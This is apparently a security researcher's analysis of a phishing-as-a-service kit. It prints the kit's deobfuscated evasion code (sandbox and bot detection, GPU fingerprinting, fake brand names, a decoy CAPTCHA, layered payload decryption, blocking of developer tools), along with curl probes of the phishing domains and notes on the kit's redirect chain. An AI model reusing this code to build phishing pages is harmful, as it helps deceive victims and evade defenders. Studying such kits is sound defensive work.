A score below the threshold is treated as a normal browser. A score at or above the threshold is treated as automation.

Score < 8: Execution continues normally (likely a real browser)
Score ≥ 8: Execution is blocked (likely a bot or scanner)
The page sets w._vFail=true and prevents the phishing payload from loading

Score < 8: Execution continues normally
Score ≥ 8: Execution is blocked

When the threshold is exceeded, the page sets w._vFail=true and prevents the phishing payload from loading.

Gate Function:

The gate function acts as a control checkpoint that runs before any sensitive code executes. The logic works like this:

If _vOK is already set to true, the function immediately allows execution. This caches a successful validation so the checks are not repeated.
If _vFail is already set to true, execution is immediately blocked. Once a browser is flagged as automated, it remains blocked for the rest of the session.

window._vG=function(){
    if(w._vOK===true)return false;
    if(w._vFail===true)return true;
    var score=w._vE();
    if(score>=8){
        w._vFail=true;
        return true;
    }
    w._vOK=true;
    return false;
};

If neither flag is set, the function calls _vE to calculate the environment score. If the score meets or exceeds the threshold, _vFail is set and execution stops. Otherwise, _vOK is set and the page continues loading.

This ensures that automated scanners and headless analysis tools never see the phishing payload, while real user browsers proceed through the rest of the attack chain without interruption.

Sandbox Detection

Beyond basic bot detection, the page implements sophisticated sandbox analysis detection to identify if it’s running in a security researcher’s controlled environment.

Sandboxes are isolated testing environments used by analysts to safely examine malicious code. This layer specifically targets those tools.

var _isSandbox=!1,_isAnalysis=!1,_sandboxScore=0;

// Check for iframe sandbox
try{
    if(_w.self!==_w.top){
        try{_w.top.location.href;}catch(e){_sandboxScore+=1;}
    }
}catch(e){_sandboxScore+=1;}

// Test eval functionality
try{
    var _origEval=_w.eval;
    var _evalTest=_origEval('1+1');
    if(_evalTest!==2)_sandboxScore+=2;
}catch(e){_sandboxScore+=1;}

// Check function toString
var _fnToStr=_a.prototype.toString;
try{
    var _testFn=function(){return 1};
    var _str=_fnToStr.call(_testFn);
    if(_str.indexOf('return 1')===-1&&_str.indexOf('native code')===-1)_sandboxScore+=2;
}catch(e){_sandboxScore+=1;}

// Debugger timing detection
var _debugStart=_ts();
(function(){})();
var _debugEnd=_ts();
if(_debugEnd-_debugStart>100)_sandboxScore+=3;

// Node.js detection
if(typeof process!=='undefined'&&process.versions&&process.versions.node)_sandboxScore+=5;
if(typeof module!=='undefined'&&module.exports)_sandboxScore+=3;
if(typeof require==='function'&&typeof require.resolve==='function')_sandboxScore+=3;

Browser Fingerprinting:

In addition to the JavaScript environment checks, the page performs browser fingerprinting to detect sandboxed or virtualized environments.

This stage looks for missing browser features and hardware characteristics that are difficult to fake convincingly. Real user browsers provide a complete set of web APIs and expose accurate hardware information through WebGL.

Analysis sandboxes and lightweight virtual machines often implement only the minimum required functionality, creating detectable gaps.

Missing API Detection

Modern browsers implement the full web API surface. Sandboxes tend to prioritize speed and isolation, often omitting storage APIs, cryptographic functions, and cache mechanisms that real websites depend on.

// Check for missing browser APIs
var _browserGlobals=['localStorage','sessionStorage','indexedDB','caches','crypto'];
var _missingCount=0;
for(var i=0;i<_browserGlobals.length;i++){
    try{if(typeof _w[_browserGlobals[i]]==='undefined')_missingCount++;}catch(e){_missingCount++;}
}
if(_missingCount>=3)_sandboxScore+=3;

The script checks for the presence of several standard browser APIs expected in a modern browser environment.

APIs Tested: localStorage, sessionStorage, indexedDB, caches, and crypto

Real browsers implement all of these APIs because they are part of the standard web platform. Sandbox environments and automated analysis tools often omit less commonly used features to reduce complexity and resource usage.

If three or more of these APIs are missing or inaccessible, the environment is treated as suspicious and +3 points are added to the sandbox score.

WebGL Hardware Fingerprinting

Real user devices rely on physical GPUs from vendors like Intel, NVIDIA, or AMD, which expose consistent renderer information through WebGL.

Analysis environments frequently run inside virtual machines or containers that use software rendering or virtual GPU drivers, which are easily identifiable.

// Canvas fingerprinting
try{
    var canvas=_d.createElement('canvas');
    var gl=canvas.getContext('webgl')||canvas.getContext('experimental-webgl');
    if(gl){
        var debugInfo=gl.getExtension('WEBGL_debug_renderer_info');
        if(debugInfo){
            var vendor=gl.getParameter(debugInfo.UNMASKED_VENDOR_WEBGL);
            var renderer=gl.getParameter(debugInfo.UNMASKED_RENDERER_WEBGL);
            if(/SwiftShader|LLVMpipe|VirtualBox|VMware/i.test(renderer))_s+=3;
        }
    }
}catch(e){_s+=2}

The script creates a canvas element and requests a WebGL rendering context.

If available, it uses the WEBGL_debug_renderer_info extension to read the unmasked GPU vendor and renderer strings, exposing the actual graphics backend being used by the browser.

These renderer strings are then compared against known virtualized or software-based graphics implementations.

Common VM and Software Renderers Detected:

SwiftShader: Software OpenGL implementation with no physical GPU
LLVMpipe: Mesa software rasterizer used in Linux virtual machines
VirtualBox and VMware: Virtual GPU drivers for virtual machines

If any of these signatures are detected, +3 points are added to the sandbox score. If WebGL fails entirely or cannot be initialized, which is common in minimal sandbox environments, the script assumes restricted graphics support and adds +2 points.

Why This Works

While user agent strings and simple JavaScript properties can be spoofed, WebGL renderer values require low-level graphics driver manipulation to fake convincingly. Combined with missing API detection, this creates a fingerprint that is difficult for automated analysis tools to fully replicate.

A real Chrome browser running on physical hardware will pass both checks with no score increase (score +0). A sandboxed browser running inside a virtual machine typically triggers both the missing API detection and the virtual GPU detection, resulting in a cumulative score increase (score +6 or more) that contributes to blocking the phishing payload from loading.

Random Brand Name Generator

To appear more legitimate and evade signature-based detection, the page dynamically generates fake company names for the CAPTCHA interface each time it loads.

This prevents security tools from flagging the page based on a known fake brand name, since the name changes with every visit. The random generation also creates the illusion of a professional security verification service.

var prefixes=['','Global ','International ','Advanced ','Modern ','Next ','New ','First ','Prime ','Elite '];
var brands=['Secure','Cloud','Digital','Smart','Prime','Core','Net','Web','Data','Tech','Pro','One','Hub','Link','Base'];
var suffixes=['Services','Platform','Systems','Solutions','Connect','Portal','Gateway','Access','Suite','Center'];

var formats=[
    function(p,b,s){return p+b+s},
    function(p,b,s){return p+b+' '+s},
    function(p,b,s){return b+s},
    function(p,b,s){return b+' '+s}
];

window._brand=_r(formats)(_r(prefixes),_r(brands),_r(suffixes)).trim();
// Example output: "Global Smart Platform", "Digital Solutions", etc.

document.title=_r(titleFormats)(window._brand);

How the Generator Works

Component Arrays: Three arrays contain words used to construct the brand name.

Prefixes include an empty value or corporate modifiers such as Global, Advanced, Modern, and Elite.
Brand terms consist of generic technology and security words like Secure, Cloud, Digital, Smart, and Data.
Suffixes describe services or platforms, including Services, Solutions, Gateway, Portal, and Center.

Format Selection: One of four formatting functions is selected at random to control whether components are concatenated directly or separated by spaces.

Random Choice: A helper function _r() selects one random prefix, one brand term, one suffix, and one format function using Math.random().

Brand Assembly: The selected format function combines the three components into a single string, which is trimmed to remove extra whitespace.

Page Title Injection: The generated brand name is assigned to document.title, causing the browser tab and page header to display the fake company name.

Example Generated Names:

“Global Secure Services”
“Digital Platform”
“Smart Solutions”
“CloudGateway”
“Next Tech Center”
“Prime Data Systems”
“SecureConnect”

Why This Works:

Each page load produces a different brand name, preventing security scanners from relying on static text signatures to identify the page.

Because there is no hardcoded company name, threat intelligence systems cannot search for or block a specific identifier.

The generated names closely resemble legitimate enterprise security vendors, which increases user trust during the CAPTCHA phase.

The use of generic technology terms avoids inconsistencies that might arise from pretending to be a specific real company.

This approach also adds polish to the phishing page. Compared to static or obviously fake branding, dynamic name generation makes the operation appear more professional and harder to distinguish from legitimate security workflows.

With 10 prefixes, 15 brand terms, 10 suffixes, and 4 formatting options, the generator can produce approximately 6,000 unique brand name combinations, making comprehensive detection and cataloging impractical for automated security tools.

Anti-Bot CAPTCHA System

The CAPTCHA implementation serves two purposes: filtering automated traffic and appearing legitimate to the victim.

The system generates simple math problems, applies visual distortion, validates answers with timing checks, and tracks failed attempts to prevent brute-force solving.

Challenge Generation

The math challenge is generated using a function that randomly selects addition or subtraction. For addition, two numbers between 1 and 10 are chosen.

For subtraction, the first number is between 10 and 29, and the second number is between 1 and 10 to ensure a positive result. The function returns both the equation as a string and the correct answer.

function _0x126f8d(){
    const _0x5ae264=['+','-'];
    const _0x3b109d=_0x5ae264[Math.floor(Math.random()*_0x5ae264.length)];
    let _0xfedd4d,_0x4860bb,_0x5d85a2;
    
    switch(_0x3b109d){
        case'+':
            _0xfedd4d=Math.floor(Math.random()*10)+1;
            _0x4860bb=Math.floor(Math.random()*10)+1;
            _0x5d85a2=_0xfedd4d+_0x4860bb;
            break;
        case'-':
            _0xfedd4d=Math.floor(Math.random()*20)+10;
            _0x4860bb=Math.floor(Math.random()*10)+1;
            _0x5d85a2=_0xfedd4d-_0x4860bb;
            break;
    }
    
    return {
        'equation':_0xfedd4d+' '+_0x3b109d+' '+_0x4860bb+' = ?',
        'answer':_0x5d85a2,
        'num1':_0xfedd4d,
        'num2':_0x4860bb,
        'op':_0x3b109d
    };
}

Visual Distortion

The CAPTCHA is rendered on a canvas element with 20 random Bézier curves in semi-transparent colors to create background noise.

Each character of the equation is drawn individually with randomized rotation, position offset, and scaling.

The font is randomly selected from four families, the color is chosen from a predefined palette, and a drop shadow adds depth. These distortions make automated parsing more difficult while remaining readable to a human.

function _0x5c6ec6(_0x2045d9,_0x4a094d){
    const _0x1cd61f=_0x2045d9.getContext('2d');
    const _0x7099b5=_0x2045d9.width;
    const _0x41acf0=_0x2045d9.height;
    
    // Background gradient
    _0x1cd61f.fillStyle='#ffffff';
    _0x1cd61f.fillRect(0,0,_0x7099b5,_0x41acf0);
    
    // Draw random curves for noise
    for(let _0x2abd86=0;_0x2abd86<20;_0x2abd86++){
        _0x1cd61f.beginPath();
        _0x1cd61f.lineWidth=1+Math.random();
        _0x1cd61f.strokeStyle='rgba('+(100+Math.random()*155)+', '+(100+Math.random()*155)+', '+(100+Math.random()*155)+', '+(0.3+Math.random()*0.2)+')';
        _0x1cd61f.moveTo(Math.random()*_0x7099b5,Math.random()*_0x41acf0);
        _0x1cd61f.bezierCurveTo(
            Math.random()*_0x7099b5,Math.random()*_0x41acf0,
            Math.random()*_0x7099b5,Math.random()*_0x41acf0,
            Math.random()*_0x7099b5,Math.random()*_0x41acf0
        );
        _0x1cd61f.stroke();
    }
    
    // Draw equation with distortion
    const _0x565782=_0x4a094d.split('');
    const _0x3ad41a=['Arial','Verdana','Times New Roman','Courier New'];
    const _0x34a815=['#1a73e8','#ea4335','#fbbc04','#5f6368','#34a853'];
    
    _0x565782.forEach((_0x3a6290,_0x5435ad)=>{
        _0x1cd61f.save();
        const _0x860cfb=_0x16cfec+_0x5435ad*30+(Math.random()-0.5)*10;
        const _0x264f68=_0x42f887+(Math.random()-0.5)*10;
        const _0x27110a=(Math.random()-0.5)*0.4;
        const _0x21148a=0.9+Math.random()*0.3;
        
        _0x1cd61f.translate(_0x860cfb,_0x264f68);
        _0x1cd61f.rotate(_0x27110a);
        _0x1cd61f.scale(_0x21148a,_0x21148a);
        
        // Shadow effect
        _0x1cd61f.shadowColor='rgba(0,0,0,0.3)';
        _0x1cd61f.shadowBlur=2;
        _0x1cd61f.shadowOffsetX=1;
        _0x1cd61f.shadowOffsetY=1;
        
        _0x1cd61f.font='bold '+(18+Math.random()*8)+'px '+_0x3ad41a[Math.floor(Math.random()*_0x3ad41a.length)];
        _0x1cd61f.fillStyle=_0x34a815[Math.floor(Math.random()*_0x34a815.length)];
        _0x1cd61f.fillText(_0x3a6290,0,0);
        _0x1cd61f.restore();
    });
}

Validate CAPTCHA Answer:

The CAPTCHA answer is validated by checking both the submitted value and the time taken to respond. Answers submitted too quickly are flagged as bot activity.

Failed attempts increment a counter, trigger progressive error messages, and refresh the CAPTCHA after five failures to prevent brute-force solving. Successful answers allow the page to proceed.

function _0x2d2880(){
    const _0x110113=parseInt(_0x55b414.input.value.trim(),10);
    const _0x181abf=Date.now()-_0x434e52;
    
    // Check if answered too fast (bot behavior)
    if(_0x181abf<1000||_0xf2ef96<2&&_0x3fbffb>=1){
        _0x3fbffb++;
        _0x55b414.input.classList.add('error');
        _0x55b414.errorText.textContent='Too fast! Please try again.';
        _0x55b414.error.classList.add('visible');
        _0x553edb(); // Update attempt dots
        setTimeout(()=>_0x51bda9(),1000); // Refresh CAPTCHA
        return false;
    }
    
    // Check if answer is correct
    if(_0x110113===_0x5140d4){
        return _0x4cb1eb(), true; // Success
    }else{
        _0x3fbffb++;
        _0x55b414.input.classList.add('error');
        _0x553edb();
        
        const _0x4d8f07=[
            'Incorrect answer. Please try again.',
            'That\'s not quite right. Try once more.',
            'Wrong answer. Check your math.',
            'Hmm, that\'s incorrect. Please retry.',
            'Oops! Try once more.'
        ];
        _0x55b414.errorText.textContent=_0x4d8f07[Math.min(_0x3fbffb-1,_0x4d8f07.length-1)];
        _0x55b414.error.classList.add('visible');
        
        // Max attempts exceeded
        if(_0x3fbffb>=5){
            _0x55b414.errorText.textContent='Too many failed attempts. Refreshing...';
            setTimeout(()=>window.location.reload(),2000);
            return false;
        }
        
        setTimeout(()=>_0x51bda9(),1500);
        return false;
    }
}

Honeypot Fields (Bot Trap)

The page deploys honeypot form fields to detect automated form fillers.

These fields are dynamically generated and hidden from view, ensuring that legitimate users never interact with them. Bots that blindly populate all inputs on a page will fill these fields and immediately trigger detection.

function _0x46f241(){
    const _0x5b26b2=['email','username','password','address','phone','postal','city'];
    const _0x4a2c13=document.querySelector('.captcha-card');
    
    if(_0x4a2c13){
        for(let _0x487572=0;_0x487572<3;_0x487572++){
            const _0x401161=document.createElement('input');
            _0x401161.type=Math.random()>0.5?'text':'password';
            _0x401161.name=_0x5b26b2[_0x1cd96f(0,_0x5b26b2.length-1)]+'_'+_0x367ab4();
            _0x401161.autocomplete='off';
            _0x401161.tabIndex=-1;
            
            const _0x156621=_0x1cd96f(0,4);
            switch(_0x156621){
                case 0:
                    _0x401161.style.cssText='position:absolute;left:-9999px;';
                    break;
                case 1:
                    _0x401161.style.cssText='clip:rect(0,0,0,0);position:absolute;';
                    break;
                case 2:
                    _0x401161.style.cssText='visibility:hidden;position:absolute;';
                    break;
                case 3:
                    _0x401161.style.cssText='opacity:0;pointer-events:none;position:absolute;';
                    break;
                case 4:
                    _0x401161.style.cssText='position:absolute;width:1px;height:1px;overflow:hidden;';
                    break;
            }
            
            _0x4a2c13.appendChild(_0x401161);
            
            // If filled, redirect (bot detected)
            _0x401161.addEventListener('input',()=>{
                window.location.href='about:blank';
            });
        }
    }
}

How It Works:

The function dynamically inserts three hidden input fields into the CAPTCHA container each time the page loads. These inputs are added after the visible form is rendered, ensuring they exist in the DOM while remaining invisible to real users.

Believable Field Names: The field names are constructed to look legitimate. Each input uses a common form label such as email, username, or password, followed by a random suffix. This naming pattern is intended to attract automated form fillers that scan for familiar input names and populate them automatically.

Mixed Input Types: Each honeypot field randomly alternates between text and password input types. This variation makes the fields resemble real login inputs and reduces the chance that bots skip them based on type alone.

Multiple Hiding Techniques: The inputs are hidden using one of five different CSS techniques. These include positioning the element far off‑screen, clipping it to a zero‑sized rectangle, setting visibility to hidden, setting opacity to zero with pointer events disabled, or shrinking the element to a 1×1 pixel area with overflow hidden. Rotating between multiple hiding methods prevents bots from bypassing the trap by detecting a single concealment pattern.

User Interaction Prevention: To avoid any accidental interaction by real users, the fields are removed from keyboard navigation by setting tabIndex=-1, and browser auto‑fill is disabled using autocomplete='off'.

Detection Trigger: Each honeypot field has an event listener attached. If any input is detected in one of these hidden fields, the script immediately redirects the browser to about:blank. This silently terminates the session and prevents the phishing payload from continuing to load.

Visibility Warning System

The page monitors when the user switches tabs, minimizes the browser, or clicks away from the active window. When this happens, a visible warning is displayed to discourage the victim from leaving the page during the verification process.

function _0x20a584(){
    document.addEventListener('visibilitychange',function(){
        if(document.hidden){
            _0x55b414.warning.classList.add('active');
        }else{
            _0x55b414.warning.classList.remove('active');
        }
    });
    
    window.addEventListener('blur',function(){
        _0x55b414.warning.classList.add('active');
    });
    
    window.addEventListener('focus',function(){
        _0x55b414.warning.classList.remove('active');
    });
}

How It Works:

The function registers multiple event listeners that track page visibility and window focus state. These listeners work together to detect any loss of attention, regardless of how the user navigates away.

Visibility API Detection: The script listens for the visibilitychange event and checks the document.hidden property. When the browser tab becomes inactive, such as when the user switches to another tab, the warning element is activated.

Window Blur Detection: A blur event listener detects when the browser window loses focus entirely, such as when the user clicks another application or minimizes the browser. This triggers the same warning state.

Window Focus Restoration: When the user returns to the page, either by refocusing the window or switching back to the tab, the focus event removes the warning and restores the normal interface.

Warning Display Logic: The warning is shown by adding an active class to a dedicated warning element. This typically displays an overlay or message instructing the user to keep the page active. When focus is regained, the class is removed and the warning disappears.

This mechanism is designed to maintain user engagement during the phishing flow. By immediately reacting to tab changes or window focus loss, the page discourages victims from opening new tabs to inspect the URL, search for the displayed company name, or consult external sources. Warning messages such as “Please keep this window active” introduce urgency and subtly pressure the user to comply.

In addition to influencing user behavior, this system can be used to log how often victims attempt to navigate away, providing insight into hesitation or suspicion during the attack flow.

Encryption and Decryption Functions

The page is heavily obfuscated using multiple encryption layers to hide the final payload from scanners and static analysis.

A simple XOR layer is used first for fast obfuscation, followed by AES-256-CBC to protect the actual payload content.

Each layer must be decoded in the correct order. If any step fails, the payload never becomes readable or executable.

CryptoJS Library Loading

Before any encryption or decryption happens, the page loads the CryptoJS library from a CDN in the document .

This library is used for:

AES-256-CBC encryption/decryption
SHA-256 hashing for key derivation
Base64 and Hex encoding/decoding
Makes the CryptoJS object globally available

CryptoJS is widely used and well known, so including it does not stand out. It saves the developer from writing their own AES and hashing code and works reliably across browsers.

Because it is hosted on a trusted CDN, its presence does not usually trigger alerts. If this library fails to load, the payload cannot be decrypted and execution stops.

XOR Decryption (First Layer):

The first decoding step removes a lightweight obfuscation layer using XOR.

function _0x3c2600(_0x2ae0a7,_0xc9d7cd){
    let _0x8d2675=_0x2ae0a7.replace(/-/g,'+').replace(/_/g,'/');
    while(_0x8d2675.length%4)_0x8d2675+='=';  // Add padding
    
    const _0x29541f=atob(_0x8d2675);  // Base64 decode
    let _0x458eaa='';
    
    // XOR each byte with key
    for(let _0x5a5d0c=0;_0x5a5d0c<_0x29541f.length;_0x5a5d0c++){
        _0x458eaa+=String.fromCharCode(
            _0x29541f.charCodeAt(_0x5a5d0c)^
            _0xc9d7cd.charCodeAt(_0x5a5d0c%_0xc9d7cd.length)
        );
    }
    return _0x458eaa;
}

The function converts URL-safe Base64 back to normal Base64, restores missing padding, and decodes it into raw bytes. Each byte is then XORed with a repeating key.

This does not provide strong security by itself. Its purpose is to break simple signatures and prevent the encrypted payload from being obvious in source code.

XOR Encryption (Reverse Operation):

This function performs the reverse process when encrypting data.

function _0x466f00(_0xe53cf,_0x5aeba3){
    let _0x4611c3='';
    
    // XOR encrypt each character
    for(let _0x2a8d71=0;_0x2a8d71<_0xe53cf.length;_0x2a8d71++){
        _0x4611c3+=String.fromCharCode(
            _0xe53cf.charCodeAt(_0x2a8d71)^
            _0x5aeba3.charCodeAt(_0x2a8d71%_0x5aeba3.length)
        );
    }
    
    // Base64 encode result
    let _0xaabb02=btoa(_0x4611c3);
    
    // Convert to URL-safe Base64
    return _0xaabb02.replace(/\+/g,'-').replace(/\//g,'_').replace(/=/g,'');
}

The output is URL-safe Base64 so it can be embedded in JavaScript or passed around without breaking parsing.

CryptoJS Decryption:

The final payload is decrypted using AES-256-CBC through CryptoJS.

window['_d']=function(_0x588bae){
    try{
        var _0x2616d7=_0x588bae.replace(/-/g,'+').replace(/_/g,'/');
        var _0x273ac8=CryptoJS.enc.Base64.parse(_0x2616d7);
        var _0x3c1c5e=CryptoJS.enc.Hex.parse(_0x273ac8.words.slice(0,4));
        var _0x3dec48=CryptoJS.enc.Hex.parse(_0x273ac8.words.slice(4));
        
        return CryptoJS.AES.decrypt(
            {ciphertext:_0x3dec48},
            CryptoJS.SHA256(_k),
            {
                'iv':_0x3c1c5e,
                'mode':CryptoJS.mode.CBC,
                'padding':CryptoJS.pad.Pkcs7
            }
        ).toString(CryptoJS.enc.Utf8);
    }catch(_0x4964a8){
        return null;
    }
};

The encrypted input is converted from URL-safe Base64 into binary data. The first part is used as the initialization vector, and the rest is treated as the AES ciphertext.

The AES key is derived by hashing a static key string with SHA-256. If decryption fails for any reason, the function returns null and the payload never executes.

Encryption Key:

The AES key is stored as multiple string fragments that are concatenated at runtime.

var _k='K9mP2xQ7vR'+'4nL8jF3wE6'+'yT1hG5bN0c'+'Z9aD4fH8kM'+'cV6wE2sL9p';

Splitting the key makes it less obvious during quick source inspection and avoids having a single visible key string.

Anti-DevTools

The page actively prevents victims from inspecting the code or debugging the JavaScript by blocking common developer tool access methods.

These controls are designed to stop casual inspection and discourage non-technical users from exploring the page source or script behavior.

function _0x18b624(){
    // Disable right-click
    document.addEventListener('contextmenu',_0x246cfb=>{
        _0x246cfb.preventDefault();
    });
    
    // Disable keyboard shortcuts
    document.addEventListener('keydown',_0x48ad13=>{
        const _0x537f31=_0x48ad13.key.toLowerCase();
        const _0x3689e8=_0x48ad13.ctrlKey;
        const _0x3ac552=_0x48ad13.shiftKey;
        const _0x1b58ea=_0x48ad13.metaKey;
        
        const _0x39e530=['t','w','n','f','u','s']; // Ctrl+Shift+T/W/N/F/U/S
        const _0x11b8ee=['i','j','c']; // Ctrl+Shift+I/J/C
        
        // Block F12
        if(_0x537f31==='f12'){
            _0x48ad13.preventDefault();
            return;
        }
        
        // Block Ctrl+Shift+[T/W/N/F/U/S]
        if(_0x3689e8&&_0x1b58ea&&_0x39e530.includes(_0x537f31)){
            _0x48ad13.preventDefault();
            return;
        }
        
        // Block Ctrl+Shift+[I/J/C] (DevTools)
        if(_0x3689e8&&_0x1b58ea&&_0x3ac552&&_0x11b8ee.includes(_0x537f31)){
            _0x48ad13.preventDefault();
            return;
        }
        
        // Block Ctrl+U (View Source)
        if(_0x48ad13.keyCode===85){
            _0x48ad13.preventDefault();
            return;
        }
    });
    
    // Disable mouse button 2 (middle click)
    document.addEventListener('mousedown',_0x165e23=>{
        if(_0x165e23.button===1){
            _0x165e23.preventDefault();
        }
    });
}

The script attaches event listeners to the document that intercept both mouse and keyboard input. Blocked actions include:

F12: Prevents opening the Developer Tools window.
Ctrl + Shift + I: Blocks the shortcut for DevTools (Inspect tab).
Ctrl + Shift + J: Blocks the shortcut for DevTools (Console tab).
Ctrl + Shift + C: Disables the element picker/inspector tool.
Ctrl + U: Prevents viewing the raw HTML page source.
Right Click: Disables the context menu (where “Inspect” and “Save Image” usually live).
Middle Click: Prevents opening links in a new background tab.

How It Works:

All keydown events are monitored and evaluated for specific combinations associated with Developer Tools access, including modifier keys such as Ctrl, Shift, and Meta combined with known shortcut keys.

When a blocked shortcut is detected, the script calls preventDefault() to stop the browser from performing its normal action.

Middle mouse button clicks are also intercepted to prevent users from opening links in new tabs where inspection might be easier.

Limitations:

These protections can be bypassed by opening Developer Tools before the page loads, disabling JavaScript entirely, or using browser settings that force console access.

External analysis tools such as Burp Suite or Wireshark are unaffected because they operate outside the browser.

However, these bypasses require technical knowledge that typical phishing victims do not possess. For non-technical users, the page appears locked down and resistant to inspection, reducing the chance that suspicious scripts, hidden redirects, or malicious behavior are noticed before credentials are entered.

Decoy HTML Generation

The page injects invisible decoy HTML elements to inflate the DOM and hide the real phishing logic among large amounts of believable but non functional markup. These elements are never meant to be seen or interacted with by the user.

This behavior runs on every page load and produces a different DOM structure each time, which prevents static analysis tools from reliably identifying malicious components.

var componentGenerators=[
    function(){
        var inputTypes=['text','email','tel','search','url','hidden'];
        return '';
    },
    function(){
        return ''+_r(['Skip to content','Skip navigation'])+'';
    },
    function(){
        return '';
    },
    function(){
        return '';
    },
    function(){
        return '

Taking a look at our cURL output, we can see that the phishing page takes the following steps when loaded.

1. Collect Basic Browser and System Data

The script begins by gathering a large amount of standard information about the user’s computing environment and browser window.

It records properties from the window, navigator (browser/OS details), screen (resolution/size), and the document (page structure). This creates a detailed profile of the technical setup being used to view the page.

2. Capture the Full URL and Unique Identifiers

Next, the code specifically captures the entire location object, which includes the complete URL and any hash fragments like #tracking_id=xxx.

It also records unique, hard-to-spoof identifiers such as the user’s timezone offset and details about the graphics card (WebGl vendor and renderer). This data allows the server to uniquely identify the user across sessions, even without traditional cookies.

3. Package the Information as JSON

After collecting all the various data points, the script combines them into one single object. This entire object is then converted into a single, massive JSON text string.

This packaging process makes it easy to transmit the complex, structured data across the internet in one go.

4. Create and Prepare a Hidden Submission Form

The script programmatically creates an invisible HTML form and a hidden input field within the webpage.

The form’s submission method is set to POST, and its destination is set to the current page’s full URL. The JSON string created in the previous step is placed into the hidden input field named data.

5. Immediately Send the Data to the Server

Finally, the code appends the hidden form to the page’s body and immediately executes the form’s submit command.

This action instantly sends all the collected browser fingerprinting data back to the server. The entire process of collection and submission happens silently and immediately when the script executes.

Following the Javascript Redirects

Next, we need to figure out where the form is submitted.

Since curl can’t execute the javascript that submits the form, we’ll need a browser. There are many options for this, but the simplest and fastest is to use a web-based headless browser.

This will hide our IP from the attacker, and prevent any scripts from running on our machine. To find out where the script went after the form submission, we can use a tool like Browserling.

Watching the browser load the Javascript, which submits the form, we can see that it goes through several redirects:

Page 1: Landing page

We start here in the Headless Browser:

https://ssologon.eduhealthconnect.com/?#tracking_id=xxx

This page decodes the tracking ID, fingerprints the browser, submits the fingerprint data and tracking information to the server, and then submits the data via a form, redirecting the user to the next step in the process.

Page 2: Redirector Analysis

This page is an intermediate step that acts as a server-side redirector and configuration gate. The server, having received and validated the browser fingerprint from Page 1, responds with the content for this URL:

ssologon.eduhealthconnect.com/.auth/?tracking_id=[DECODED TRACKING ID]

We use cURL to find out the contents:

curl -v --max-redirs 0 “ssologon.eduhealthconnect.com/.auth/?tracking_id=xxx”

The code reveals the redirector’s logic:




    Loading...

The key information is contained in the land variable:

The string a3f9c4b1d08e5f72c6ab93d04ef1280b is a 40-character hexadecimal string (the length of a SHA-1 hash) that is a server-generated unique identifier that is dynamically inserted into the code when this page loads.

Based on the architecture of Phishing-as-a-Service (PhaaS) operations, this value most likely represents either a Static Campaign ID (a fixed key for a specific phishing template or configuration) or an Affiliate ID (a fixed key for a specific attacker’s account), though it could also be a Dynamic Session ID or a pointer to a specific Template/Resource ID on the final server.

The script’s primary action is to take the decoded tracking ID (m_e), append it to the URL containing this key, and execute an immediate client-side redirect to the final phishing domain.

Page 3: PaaS Platform Analysis

This page is where it gets really interesting, and the level of sophistication jumps up exponentially, indicating that we may have stumbled upon a commercial grade Phishing-as-a-Service system.

https://logonacc.ssologon.clctz.org/a3f9c4b1d08e5f72c6ab93d04ef1280b/?OLMDT=CDfkI&fomo=[DECODED TRACKING ID]

We use cURL to find out the contents:

curl -v --max-redirs 0 “https://logonacc.ssologon.clctz.org/a3f9c4b1d08e5f72c6ab93d04ef1280b/?OLMDT=CDfkI&fomo=xxx”

Where the first page showed only light obfuscation, this stage loads a huge, highly engineered script that runs advanced fingerprinting, invasive browser checks, and layered obfuscation and evasion, making it difficult to understand at a glance.

The page code is more than 7,700 lines of HTML and JavaScript, with significant portions hidden inside WebAssembly compiled from Rust.

The structure, scale, and concealment techniques all indicate that this code is designed to gather extensive information about the visitor while making manual analysis as difficult as possible.

Defense Mechanisms

The code implements a multilayered defensive architecture. Each layer must be bypassed sequentially, like peeling an onion, before an analyst can reach the true fingerprinting logic.

When a victim clicks the phishing link, the JavaScript and hidden WebAssembly module begin collecting an alarmingly large and detailed dataset.

This dataset includes over seventy browser, device, and permission properties, along with WebGL/GPU identifiers and bot detection signals.

The attacker’s server evaluates the environment and decides whether the visitor is a genuine target or an analyst.

Layer 1: The Scrambled Dictionary (String Obfuscation)

Before any logic can be observed, all human‑readable JavaScript identifiers are stripped from the code. Examples include:

plugins
deviceMemory
hardwareConcurrency
screenX, screenY
userAgent
permissions
createElement
navigator
all fields involved in fingerprinting

Instead, the script uses scrambled calls like:

a0P(597, 233)

These strings are packed into an encrypted, shuffled dictionary that is:

XOR‑encrypted with a constant key
Randomly reshuffled on each run
Accessed only through numeric indices
Opaque to direct reading or searching
Unrecoverable through simple string inspection

To defeat this, we have to isolate the self‑executing decode function and run it independently, which allowed us to recover:

The full decrypted dictionary
All original JavaScript identifiers
All WASM glue symbols

With the dictionary restored, we use a script to replace every lookup (a0P(...)) with its real string, returning the source to human‑readable form and exposing the fingerprinting logic.

Layer 2: The Tripwires (Anti-Debugging Traps)

With the code readable again, the second layer revealed a set of anti‑analysis traps engineered to break devtools or force an error that, when detected, redirected the user to the BBC (BBC.com) homepage.

Key Tripwires

A recursive devtools‑detection routine that triggers an infinite self‑call and freezes both the tab and debugger
Script integrity checks to detect breakpoints or patched code
Timing‑based anti‑debug traps
Event‑loop abuse used to stall or desynchronize debugging
Redirects to the BBC homepage if tampering is detected

These mechanisms block any attempt to step into the fingerprinting logic.

Once the dictionary was restored in the previous step, we can see the names of every anti‑debug routine.

We removed the recursive infinite‑loop trap, the source‑integrity checks, the timing‑based devtools traps, and the redirect logic.

This stabilized execution, allowing controlled, step‑by‑step debugging of the WASM interface and the fingerprinting logic.

Layer 3: The Black Box (WebAssembly Obfuscation)

The deepest layer was a Rust‑compiled WebAssembly module, concealed within a dense collection of Base64 payloads.

These were split across:

173 separate Base64 strings
131,884 characters combined
98,911-byte decoded WASM (~96.6 KB)
1,001 unique decoded strings extracted

Rust Project Structure

We reconstructed the Rust project layout by analyzing the decoded WASM strings and the calls to URLs and functions, which revealed how the code was organized.

crates/
├── bg/src/
│   ├── core/
│   │   ├── screen.rs
│   │   ├── navigator.rs
│   │   ├── automation.rs
│   │   └── gpu.rs
│   ├── models.rs
│   └── utils.rs
└── ciphers/src/
    └── ciphers.rs

Compiler Metadata

The WebAssembly module was compiled with a specific version of the Rust compiler, identified by the commit f8297e351a40c1439a467bbbb6879088047f50b3. This shows exactly which Rust build was used to produce the WASM binary.

The module also relied on a few Rust libraries (called crates) to interact with the browser and handle asynchronous tasks:

wasm-bindgen 0.2.100: allows Rust code to communicate with JavaScript and manipulate the DOM
